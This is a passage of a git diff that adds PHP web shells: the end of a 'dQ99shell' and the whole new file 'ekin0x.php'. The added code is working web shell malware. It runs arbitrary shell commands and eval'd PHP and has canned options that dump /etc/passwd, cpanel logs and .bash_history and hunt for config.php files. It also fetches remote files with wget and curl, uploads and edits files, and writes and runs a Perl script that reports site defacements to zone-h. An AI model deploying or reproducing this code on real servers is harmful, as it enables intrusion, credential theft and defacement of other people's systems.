copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +function fs_copy_obj($d,$t) { + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) { return copy($d,$t); } + else { return FALSE; } +} +function fs_move_dir($d,$t) { + + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) { + if (($o != ".") and ($o != "..")) { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +function fs_move_obj($d,$t) { + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +function fs_rmdir($d) { + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) { + if (($o != ".") and ($o != "..")) { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +function fs_rmobj($o) { + $o = 
str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +## END FILESYSTEM FUNCTIONS ## +function onphpshutdown() { + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function dQ99shexit() { onphpshutdown(); exit; } + +function dQ99fsearch($d) { + global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) { + if($f != "." && $f != "..") { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {dQ99fsearch($d.$f);} + } + else { + $search_i_f++; + if ($bool) { + if (!empty($a["text"])) { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +function view_size($size) { + if (!is_numeric($size)) { return FALSE; } + else { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . 
" B";} + return $size; + } +} +function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);} +function view_perms($mode) { + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + return $type.join("",$owner).join("",$group).join("",$world); +} +function parse_perms($mode) { + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +function 
parsesort($sort) { + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +function view_perms_color($o) { + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +function str2mini($content,$len) { + if (strlen($content) > $len) { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } else {return $content;} +} +function strips(&$arr,$k="") { + if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } } + else { $arr = stripslashes($arr); } +} + +function getmicrotime() { + list($usec, $sec) = explode(" ", microtime()); + return ((float)$usec + (float)$sec); +} + +function milw0rm() { + $Lversion = php_uname(r); + $OSV = php_uname(s); + if(eregi("Linux",$OSV)) { + $Lversion = substr($Lversion,0,6); + return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion; + } else { + $Lversion = substr($Lversion,0,3); + return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion; + } +} +function tools() { + echo "List of tools"; +} + +function sh_name() { return base64_decode("ZGlLaSBkUTk5c2hlbGwgdg==").sh_ver; } +function htmlhead($safemode) { +$style = ' + +'; +$html_start = ' + +'.getenv("HTTP_HOST").' - '.sh_name().' +'.$style.' + + + +

        '.sh_name().'

        .: r57.biz Dq99Shell :.
        +'; +return $html_start; +}; +function footer() { + echo "
        By www.r57.biz, © 2008 FeeLCoMz Community, Generated: ".round(getmicrotime()-starttime,4)." seconds
        "; +} +chdir($lastdir); dQ99shexit(); +?> \ No newline at end of file diff --git a/php/ekin0x.php b/php/ekin0x.php new file mode 100644 index 0000000..1ae3a10 --- /dev/null +++ b/php/ekin0x.php @@ -0,0 +1,607 @@ +";print"
        $delmtxt
        ";} +function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); +$nscmd=htmlspecialchars($scmd);print $nscmd;} +elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); +$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} +elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); +while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; +print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ +ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ +ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); +print htmlspecialchars($pret);}} +function input($type,$name,$value,$size) +{if (empty($value)){print "";} +elseif(empty($name)&&empty($size)){print "";} +elseif(empty($size)){print "";} +else {print "";}} +function permcol($path){if (is_writable($path)){print ""; +callperms($path); print "";} +elseif (!is_readable($path)&&!is_writable($path)){print ""; +callperms($path); print "";} +else {print "";callperms($path);}} +if ($dlink=="dwld"){download($_REQUEST['dwld']);} +function download($dwfile) {$size = filesize($dwfile); +@header("Content-Type: application/force-download;name=$dwfile"); +@header("Content-Transfer-Encoding: binary"); +@header("Content-Length: $size"); +@header("Content-Disposition: attachment; filename=$dwfile"); +@header("Expires: 0"); +@header("Cache-Control: no-cache, must-revalidate"); +@header("Pragma: no-cache"); +@readfile($dwfile); exit;} +?> + + +Ekin0x Shell + + + + + +$sf="
        ";$ef="
        "; +$st=""; +$et="
        ";$c1=""; +$c2="";$ec=""; +$sta=""; +$sfnt="";$efnt=""; +################# Ending of common variables ######################## + +print"";print"";print"
        "; print"
        ## Ekin0x Shell ## +
        "; print"
        ";print "
        "; +print"";print"";print"
        "; print"
        ";print "Home"; +print " - Geri"; +print " - phpinfo"; +if ($dlink=='phpinfo'){print phpinfo();die();} +print " - Base64 decode"; +print " - Url decode"; +print " - Url encode"; +print " - Md5"; +print " - Izinleri Kontrol Et"; +print " - File source"; +print " - Quick index"; +print " - Zone-h"; +print " - Mail"; +print " - Cmd help"; +if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase'])); +print "

        Result is : $sfnt".$cbase."$efnt"; die();} +if ($dlink=="basepw"){ print "

        [ Base64 - Decoder ]"; +print $sf;input ("text","ncbase",$ncbase,35);print " "; +input ("submit","","Decode","");print $ef; die();} +if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld'])); +print "

        Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){ +print "

        [ Url - Decoder ]"; print $sf; +input ("text","nurld",$nurld,35);print " "; +input ("submit","","Decode","");print $ef; die();} +if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "

        Result is : $sfnt".$urlenc."$efnt"; die();} +if ($dlink=='urlen'){print "

        [ Url - Encoder ]"; +print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();} +if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf'])); +print "

        Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){ +print "

        [ MD5 - Encoder ]"; +print $sf;input ("text","nmdf",$nmdf,35);print " "; +input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef; +print "

        ";print "

        ";print "

        ";die();} +function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){ +print "

        [ Sorry, U choosed an empty file or the file not exists ]";die();} +elseif(isset($showsc)&&filesize($showsc) !=="0") { +print "

        "; +if (!show_source($showsc)||!function_exists('show_source')){print "
        [ Sorry can't complete the operation ]
        ";die();}print "
        ";die();}}if ($dlink=='showsrc'){ +print "

        : Choose a php file to view in a color mode, any extension else will appears as usual :";print "

        "; +input ("text","showsc","",35);print " "; +input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));} +if ($dlink=='cmdhlp'){ +print "

        : Insert the command below to get help or to know more about it's uses :";print ""; +input ("text","hlp","",35);print " "; +input ("submit","","Help","");print $ef; die();} +if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp']; +print "

        [ The command is $sfnt".$hlp."$efnt ]"; +$hlp = escapeshellcmd($hlp);print "

        "; +if (!function_exists(shell_exec)&&!function_exists(exec)&& +!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "
        [ Sorry can't complete the operation ]
        ";}else {print "
        ";
        +if(!callfuncs("man $hlp | col -b")){print "
        [ Finished !! ]";}print "
        ";}print "
        ";die();} +if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) +{if (touch ($_REQUEST['indx'])==true){ +$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); +fclose($fp);print "

        [ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]

        ";print "
        [ Yeniden Editle +] -- [ Curr-Dir ]
        ";die(); }else {print "

        [ Sorry, Can't create the index !! ]

        ";die();}} +if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ +print $sf."
        ";print "

        "; +input ("text","indx","Index-name",35);print " "; +input ("submit","qindsub","Create","");print $ef;die();} +if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ +$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; +if (mail($mailto,$subj,$mailtxt)){print "

        [ Mail sended to $sfnt".$mailto." $efnt successfully ]

        "; die();}else {print "

        [ Error, Can't send the mail ]

        ";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "

        [ Error, Can't send the mail ]

        ";die();} +if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ +print $sf."
        ";print "

        ";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; +input ("submit","mailsub","Send-mail","");print $ef;die();} +if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} +function callzone($nscdir){ +if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} +else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} +fwrite ($fpz,"\$arq = @ARGV[0]; +\$grupo = @ARGV[1]; +chomp \$grupo; +open(a,\"<\$arq\"); +@site = ; +close(a); +\$b = scalar(@site); +for(\$a=0;\$a<=\$b;\$a++) +{chomp \$site[\$a]; +if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } +print \"[+] Sending \$site[\$a]\n\"; +use IO::Socket::INET; +\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; +print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; +print \$sock \"Accept: */*\r\n\"; +print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; +print \$sock \"Accept-Language: pt-br\r\n\"; +print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; +print \$sock \"Connection: Keep-Alive\r\n\"; +print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; +print \$sock \"Host: old.zone-h.org\r\n\"; +print \$sock \"Content-Length: 385\r\n\"; +print \$sock \"Pragma: no-cache\r\n\"; +print \$sock \"\r\n\"; +print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\"; +close(\$sock);}"); +if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); +}else{print "

        [ Can't complete the operation, try change the current dir with writable one ]
        ";}$zonet=$_REQUEST['zonet']; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "[ Can't complete the operation !! ]";} +else {callfuncs("chmod 777 $zpl;chmod 777 $li"); +ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); +print "

        [ All sites should be sended to zone-h.org successfully !! ]";die();} +}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ +print $sf."
        ";print "

        ";input ("text","zonet","Hacker-name",35);print " "; +input ("submit","zonesub","Send","");print $ef;die();} +print "
        "; print"
        ";print "
        "; +function inisaf($iniv) { $chkini=ini_get($iniv); +if(($chkini || strtolower($chkini)) !=='on'){print"Kapali ( Guvenlik Yok )";} else{ +print"Acik ( Guvenli )";}}function inifunc($inif){$chkin=ini_get($inif); +if ($chkin==""){print " None";} +else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} +elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); +while (!feof($opop)){ $nval= fgetc($opop);}} +elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ +ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} +if($nval=$owhich){print"ON";} +else{print"OFF";} } +print""; +print"
        "; print"

        "; +print"Safe-mode :\t";print inisaf('safe_mode');print "";print"
        "; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print ""; print""; print""; print""; print""; print""; print""; print "
        "; +print "
        "; print"
        Mysql : "; +callocmd('which mysql','/usr/bin/mysql'); +print"
        "; print"
        Perl : "; +callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"
        "; print"
        Gcc : "; +callocmd('which gcc','/usr/bin/gcc'); print"
        "; +print"
        Curl : "; callocmd('which curl','/usr/bin/curl'); print"
        "; print"
        GET : "; +callocmd('which GET','/usr/bin/GET'); +print"
        ";print"
        Wget : "; +callocmd('which wget','/usr/bin/wget'); +print"
        "; print"
        Lynx : "; +callocmd('which lynx','/usr/bin/lynx'); +print"
        "; }print "

        "; +print "IP Numaran : ".$REMOTE_ADDR."
        "; +print "Server IP : ".$SERVER_ADDR.""; +print"
        ".$SERVER_SIGNATURE.""; +print "Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."
        "; +print "Engelli Fonksiyonlar : ";inifunc(disable_functions);print"
        "; +print "Kimsin : "; callfuncs('id');print"
        Os : "; +if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else { +if (!function_exists(shell_exec)&&!function_exists(exec)&& +!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print php_uname(); print "/";print PHP_OS;} +else {callfuncs('uname -a');}}print"
        "; +print"Php-versiyon : ".phpversion(); print"
        Current-path : "; +print $nscdir."     [ ";permcol($nscdir);print " ]"; +print"
        ";print "Shell'in Burda : " .__file__; +print"
        Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / "; +print"Bos Alan: "; readable_size(disk_free_space($nscdir)); +print "
        "; print"

        "; +if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); +if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; } +else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir'])) +{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} +else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){ +$ncfile=trim($_REQUEST['cfile']); +if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} +else{ $mess3= "Dosya Olustur/Sil";}} +elseif(isset($_REQUEST['delfile'])){ +$ndfile=trim($_REQUEST['cfile']); +if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} +else {$mess3= "Dosya Olustur/Sil";}} +else {$mess3="Dosya Olustur/Sil";} +class upload{ function upload($file,$tmp){ +$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";} +if (@copy($tmp,$nscdir."/".$file)){ +print "
        : $file uploaded successfully :
        "; }else{print "
        : Error uploading $file :
        ";} } } } +$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){ +$ustname=trim ($_REQUEST['ustname']);ob_start(); +if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);} +if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');} +if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');} +if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');} +if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);} +if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);} +if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);} +if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);} +if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();} +if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&& +!isset($_REQUEST['rfiletxt'])){ +if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){ +$files[] = $filename; sort($files);}print "
        "; +print"
        "; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print "";if(strstr(PHP_OS,"Linux")){ +print "";} +print ""; foreach ($files as $nfiles){ +if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");} +if (is_writable("$nscdir/$nfiles")){ +$scmess2= "
        Evet";}else {$scmess2="
        Hayir";}if (is_readable("$nscdir/$nfiles")){ +$scmess3= "
        Evet";}else {$scmess3= "
        Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "
        Klasör";}else{$scmess4= "
        Dosya";} +print"
        "; print ""; print ""; +print""; +print ""; +print ""; print "";print ""; if(strstr(PHP_OS,"Linux")){ +print "";} +print ""; print ""; +}print "
        "; +print "
        Dosyalar";print "
        ";print "
        Boyut";print "
        ";print "
        Yazma";print "
        ";print "
        Okuma";print "
        ";print "
        Tür";print "
        ";print "
        Düzenleme";print "
        ";print "
        Adlandirma";print "
        ";print "
        Indir";print "
        ";print "
        Group";print "
        ";print "
        Izinler";print "
        "; +if (is_dir($nfiles)){print "[ $nfiles ]
        ";}else {print "$nfiles
        ";} +print"
        "; +print "
        "; +if (is_dir("$nscdir/$nfiles")){print "Klasör";} +elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";} +print "
        "; +print "
        $scmess2"; print "
        "; +print "
        $scmess3"; print "
        "; +print "
        $scmess4"; print"
        ";if(is_file("$nscdir/$nfiles")){ +print "
        Düzenle";}else {print "
        Düzenle
        ";}print"
        ";print "
        Adlandir";print"
        "; +if(is_file("$nscdir/$nfiles")){ +print "
        indir";}else {print "
        indir
        ";}print"
        "; +print "
        ";owgr($nfiles); +print "
        ";print"
        ";print "
        "; +permcol("$nscdir/$nfiles");print "
        ";print"
        ";print "
        ";}else {print "

        [ Can't open the Dir, permission denied !! ]

        ";}} +elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){ +if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "

        [ Executed command ][$] : ".$_REQUEST['cmd']."
        ";} +print "
        ".$sta; +if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);} +elseif(isset($_REQUEST['eval'])){ +ob_start();eval(stripslashes(trim($_REQUEST['eval']))); +$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);} +elseif (isset($_REQUEST['subqcmnds'])){ +if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');} +if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');} +if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');} +if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');} +if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');} +if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');} +if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');} +if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');} +if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');} +if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');} +if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');} +if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');} +if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');} +}print $eta."
        ";} +function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']); +if(is_readable($rfile)&&is_file($rfile)){ +$fp=fopen ($rfile,"r");print"
        "; +print "
        [ Editing ".basename($rfile)." ] [ Geri ] [ Curr-Dir ]

        "; +print $sf."";if (is_writable($rfile)){ +print "
        ".$ef;}else +{print "
        [ Can't edit ".basename($rfile)." ]

        ";}print "

        ";} +elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "
        [ You selected a wrong file name or you don't have access !! ]

        ";}} +function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']); +if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+"); +$rfiletxt=stripslashes($_REQUEST['rfiletxt']); +fwrite ($rffp,$rfiletxt);print "
        +[ ".basename($hidrfile)." Saved !! ] +[ Curr-Dir ] [ Edit again ] +

        ";fclose($rffp);} +else {print "
        [ Can't save the file !! ] [ Curr-Dir ] [ Back ]

        ";}} +if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);} +elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);} +function callperms($chkperms){ +$perms = fileperms($chkperms); + +if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; +} else { + // Unknown + $info = 'u'; +} + +// Owner +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + +// Group +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + +// World +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); print $info;} + + function readable_size($size) { + +if ($size < 1024) { +print $size . ' B'; +}else {$units = array("kB", "MB", "GB", "TB"); +foreach ($units as $unit) { +$size = ($size / 1024); +if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}} +if($dlink=='ren'&&!isset($_REQUEST['rensub'])){ +print ""; +print "
        ".$sf;input ("text","ren",$_REQUEST['ren'],20);print " "; +input ("text","renf","New-name",20);print " "; +input ("submit","rensub","Rename" ,"");print $ef;die();}else print ""; +if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){ +if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){ +print"
        [ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]
        ";print "";die();}else{print "
        [ Yeniden Adlandirilamiyor ]
        "; +print "";die();}}function fget($nscdir,$sf,$ef){print "
        "; +print "
        [ Editing ".basename($_REQUEST['edit'])." ] [ Geri ] [ Curr-Dir ]
        "; +print $sf."
